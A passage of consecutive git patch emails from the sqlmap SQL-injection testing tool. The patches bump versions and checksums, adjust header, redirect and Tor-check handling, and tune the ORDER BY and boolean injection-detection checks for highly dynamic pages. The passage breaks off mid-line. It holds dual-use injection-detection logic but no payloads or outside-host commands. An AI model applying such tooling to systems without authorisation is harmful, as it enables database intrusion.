-b51c3f8b5cc65c6d7c81471577afd87d lib/request/connect.py +bf97dd285be3cc341233a9f4e09137f8 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py @@ -111,7 +111,7 @@ cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py 5cb78b0e60fd7fd84502d62cf85d2064 lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py -4a6886d3a0c7bf768df97738fa257de9 lib/utils/search.py +fb6cf3415fbbf117e2dc87aae2f35993 lib/utils/search.py 236a8d9e596602b53f8e0aa09c30c0ef lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py 3d230e342a6c8d60ac7c68c556fbba9b lib/utils/versioncheck.py From c6c1ac02bb412916b61b8325e1b333a798de8d3a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 26 Mar 2018 15:07:43 +0200 Subject: [PATCH 091/428] Patch related to the #3009 --- lib/core/option.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 63582f5d995..902f702b451 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2359,7 +2359,7 @@ def _checkTor(): logger.info(infoMsg) try: - page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False) + page, _, _ = Request.getPage(url="https://check.torproject.org/", referer=None, raise404=False) except SqlmapConnectionException: page = None diff --git a/lib/core/settings.py b/lib/core/settings.py index 20ae2b99e32..76fc6700cec 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.42" +VERSION = "1.2.3.43" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7495cd4e1a5..b056b99ec68 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py -b7c3e98e5400d73e9ce5c1a30145f7c6 lib/core/option.py +838f38559c01a690cc04620cb15692ab lib/core/option.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -30b479368e2a9d72b055753ef3a5a740 lib/core/settings.py +d909ef19b43548c3e7eb332c0ee495b0 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From 241f7321de78d4c49bca0255b004c7d42621d2d6 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 26 Mar 2018 15:39:48 +0200 Subject: [PATCH 092/428] Proper patch related to the #3009 --- lib/core/option.py | 2 +- lib/core/settings.py | 2 +- lib/request/basic.py | 2 +- lib/request/connect.py | 2 +- txt/checksum.md5 | 8 ++++---- 5 files changed, 8 insertions(+), 8 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 902f702b451..63582f5d995 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2359,7 +2359,7 @@ def _checkTor(): logger.info(infoMsg) try: - page, _, _ = Request.getPage(url="https://check.torproject.org/", referer=None, raise404=False) + page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False) except SqlmapConnectionException: page = None diff --git a/lib/core/settings.py b/lib/core/settings.py index 76fc6700cec..0ff4f01f6e1 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.43" +VERSION = "1.2.3.44" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/basic.py b/lib/request/basic.py index 14e461946ae..6e82b2da1cf 100644 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -61,7 +61,7 @@ def forgeHeaders(items=None, base=None): if items[_] is None: del items[_] - headers = OrderedDict(base or conf.httpHeaders) + headers = OrderedDict(conf.httpHeaders if base is None else base) headers.update(items.items()) class _str(str): diff --git a/lib/request/connect.py b/lib/request/connect.py index df045c3cf4d..dc2714bf2ce 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -346,7 +346,7 @@ def getPage(**kwargs): requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str # Prepare HTTP headers - headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host}) + headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host}, base=None if target else {}) if HTTP_HEADER.COOKIE in headers: cookie = headers[HTTP_HEADER.COOKIE] diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b056b99ec68..9534c76a4f5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py -838f38559c01a690cc04620cb15692ab lib/core/option.py +b7c3e98e5400d73e9ce5c1a30145f7c6 lib/core/option.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d909ef19b43548c3e7eb332c0ee495b0 lib/core/settings.py +3f186f4f5322acd57c659532090d11ba lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -66,9 +66,9 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py -53c38db67dd4b14fbceee71e4748f874 lib/request/basic.py +7e8e0a3fdebbe443832c1bab2f8d3869 lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -bf97dd285be3cc341233a9f4e09137f8 lib/request/connect.py +a42707d6e89312659d3bdc8fb4ad1336 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py From 45fb5ab4a57d77b0c598a08d80dc2c299faa9d25 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 28 Mar 2018 15:13:33 +0200 Subject: [PATCH 093/428] Patch for cases when http: is immediatelly being redirected to https: --- lib/controller/checks.py | 10 ++++++++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 13 insertions(+), 3 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 06a395bcaee..adaff389e79 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1539,6 +1539,16 @@ def checkConnection(suppressOutput=False): else: kb.errorIsNone = True + + threadData = getCurrentThreadData() + + if kb.redirectChoice == REDIRECTION.YES and threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID: + if conf.hostname in threadData.lastRedirectURL[1] and threadData.lastRedirectURL[1].startswith("https://"): + conf.url = re.sub(r"https?://", "https://", conf.url) + match = re.search(r":(\d+)", threadData.lastRedirectURL[1]) + port = match.group(1) if match else 443 + conf.url = re.sub(r":\d+/", ":%s/" % port, conf.url) + except SqlmapConnectionException, ex: if conf.ipv6: warnMsg = "check connection to a provided " diff --git a/lib/core/settings.py b/lib/core/settings.py index 0ff4f01f6e1..467cfde3b0c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.44" +VERSION = "1.2.3.45" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9534c76a4f5..1aeffc85ebd 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -6f0db0b505eec576e28d97cced3ad338 lib/controller/checks.py +a2369719ca192945945971bfcffb42e9 lib/controller/checks.py 33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -3f186f4f5322acd57c659532090d11ba lib/core/settings.py +2dba7f74fccee64374b4efde5b8245a4 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From c7329cb03baabf753b97d08037ab34b649b6ba29 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 28 Mar 2018 15:23:14 +0200 Subject: [PATCH 094/428] Probable patch for #3013 and similar Issues --- lib/core/settings.py | 2 +- sqlmap.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 467cfde3b0c..dbfd3ba4004 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.45" +VERSION = "1.2.3.46" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index d8c236da193..0dbe6827a20 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -305,7 +305,7 @@ def main(): logger.error(errMsg) raise SystemExit - elif "valueStack.pop" in excMsg and kb.get("dumpKeyboardInterrupt"): + elif kb.get("dumpKeyboardInterrupt"): raise SystemExit elif any(_ in excMsg for _ in ("Broken pipe",)): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1aeffc85ebd..217a3369f0f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2dba7f74fccee64374b4efde5b8245a4 lib/core/settings.py +d843a0bbe94135258b29d10609e96943 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -224,7 +224,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -082aa29ab77c647a0d3830c07279d437 sqlmap.py +ecbd0edbb6ea4cb6e1277ceb294d7819 sqlmap.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py From 16cd13d7dbf3d0b6e49f3a3e6d4e7ca4604c9efa Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 28 Mar 2018 17:24:12 +0200 Subject: [PATCH 095/428] Fixes #3014 --- lib/controller/checks.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index adaff389e79..1dec8cda7d6 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1543,7 +1543,7 @@ def checkConnection(suppressOutput=False): threadData = getCurrentThreadData() if kb.redirectChoice == REDIRECTION.YES and threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID: - if conf.hostname in threadData.lastRedirectURL[1] and threadData.lastRedirectURL[1].startswith("https://"): + if conf.hostname in (threadData.lastRedirectURL[1] or "") and threadData.lastRedirectURL[1].startswith("https://"): conf.url = re.sub(r"https?://", "https://", conf.url) match = re.search(r":(\d+)", threadData.lastRedirectURL[1]) port = match.group(1) if match else 443 diff --git a/lib/core/settings.py b/lib/core/settings.py index dbfd3ba4004..c4e8a11c04c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.46" +VERSION = "1.2.3.47" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 217a3369f0f..f9792c9c647 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -a2369719ca192945945971bfcffb42e9 lib/controller/checks.py +0ee74789b09bb40e8f48baddefe21724 lib/controller/checks.py 33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d843a0bbe94135258b29d10609e96943 lib/core/settings.py +0e8b52de032cee17c76e1e01e2e15f88 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From f0677d88b7af59d7c94a11002a69dea9539ac3d3 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 29 Mar 2018 14:22:46 +0200 Subject: [PATCH 096/428] Trivial update --- lib/core/settings.py | 2 +- lib/techniques/union/test.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index c4e8a11c04c..ce2d94971eb 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.47" +VERSION = "1.2.3.48" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index dee45c66cb4..35ebc5cb9e5 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -54,7 +54,7 @@ def _orderByTest(cols): query = agent.suffixQuery(query, suffix=suffix, comment=comment) payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where) page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) - return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) + return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1): infoMsg = "'ORDER BY' technique appears to be usable. " diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f9792c9c647..3548a050127 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0e8b52de032cee17c76e1e01e2e15f88 lib/core/settings.py +f4f6c7e5f8265293270273b6415450eb lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -96,7 +96,7 @@ fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -da5a117fb64723e6c815b0e33d50f66a lib/techniques/union/test.py +d35a42c4144b822debd82c2e66c1dd4d lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py c552f8d924d962a26f2ded250bcea3b8 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py From cdb1e793709022c07fb5c5734d5297c0edec746c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 29 Mar 2018 14:37:33 +0200 Subject: [PATCH 097/428] Disabling ORDER BY tests in heavily dynamic environment --- lib/controller/checks.py | 2 ++ lib/core/option.py | 1 + lib/core/settings.py | 2 +- lib/techniques/union/test.py | 2 +- txt/checksum.md5 | 8 ++++---- 5 files changed, 9 insertions(+), 6 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 1dec8cda7d6..5e6d55ac317 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1168,6 +1168,8 @@ def checkDynamicContent(firstPage, secondPage): warnMsg += "sqlmap is going to retry the request(s)" singleTimeLogMessage(warnMsg, logging.CRITICAL) + kb.heavyDynamic = True + secondPage, _, _ = Request.queryPage(content=True) findDynamicContent(firstPage, secondPage) diff --git a/lib/core/option.py b/lib/core/option.py index 63582f5d995..7ab02a7f675 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1945,6 +1945,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.forcePartialUnion = False kb.forceWhere = None kb.futileUnion = None + kb.heavyDynamic = False kb.headersFp = {} kb.heuristicDbms = None kb.heuristicExtendedDbms = None diff --git a/lib/core/settings.py b/lib/core/settings.py index ce2d94971eb..b58d1d2a598 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.48" +VERSION = "1.2.3.49" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index 35ebc5cb9e5..9c6ca87267c 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -54,7 +54,7 @@ def _orderByTest(cols): query = agent.suffixQuery(query, suffix=suffix, comment=comment) payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where) page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) - return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None + return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and not kb.heavyDynamic and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1): infoMsg = "'ORDER BY' technique appears to be usable. " diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3548a050127..f76d2ffeea6 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -0ee74789b09bb40e8f48baddefe21724 lib/controller/checks.py +ebc0d5d4e3981c9c57197fa09e37aa91 lib/controller/checks.py 33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py -b7c3e98e5400d73e9ce5c1a30145f7c6 lib/core/option.py +8484e95c616b7a5220157c13e24fa1d6 lib/core/option.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f4f6c7e5f8265293270273b6415450eb lib/core/settings.py +b7dd1e5592efbbfd550047b53014543e lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py @@ -96,7 +96,7 @@ fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -d35a42c4144b822debd82c2e66c1dd4d lib/techniques/union/test.py +07882f244fc73e130ab1a17caa6f5fb0 lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py c552f8d924d962a26f2ded250bcea3b8 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py From ae8699f258d78ce6f8804bb9d0e8ccc04b8b6377 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 29 Mar 2018 14:47:30 +0200 Subject: [PATCH 098/428] Reducing false-positive 'appears' messages in heavily dynamic environment --- lib/controller/checks.py | 4 ++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 3 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 5e6d55ac317..925804a26f2 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -514,6 +514,10 @@ def genCmpPayload(): kb.matchRatio = _ logger.debug("adjusting match ratio for current parameter to %.3f" % kb.matchRatio) + # Reducing false-positive "appears" messages in heavily dynamic environment + if kb.heavyDynamic and not Request.queryPage(reqPayload, place, raise404=False): + continue + injectable = True elif threadData.lastComparisonRatio > UPPER_RATIO_BOUND and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)): diff --git a/lib/core/settings.py b/lib/core/settings.py index b58d1d2a598..a3e399806e6 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.49" +VERSION = "1.2.3.50" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f76d2ffeea6..4a24291ae54 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -ebc0d5d4e3981c9c57197fa09e37aa91 lib/controller/checks.py +28c80dd4b8f288f46388770415d7c1df lib/controller/checks.py 33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b7dd1e5592efbbfd550047b53014543e lib/core/settings.py +30cc59cf0722d37effce632dcd38dc62 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From 8a90512354984011151a1876dd9c058d973ba8a2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 31 Mar 2018 11:02:48 +0200 Subject: [PATCH 099/428] One more commit related to the last one (reduce false hopes in heavily dynamic cases) --- lib/controller/checks.py | 13 ++++++++++--- lib/core/option.py | 2 +- lib/core/settings.py | 2 +- lib/techniques/union/test.py | 2 +- txt/checksum.md5 | 8 ++++---- 5 files changed, 17 insertions(+), 10 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 925804a26f2..671d023421b 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -508,14 +508,14 @@ def genCmpPayload(): errorResult = Request.queryPage(errorPayload, place, raise404=False) if errorResult: continue - elif not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)): + elif kb.heuristicPage and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)): _ = comparison(kb.heuristicPage, None, getRatioValue=True) if _ > 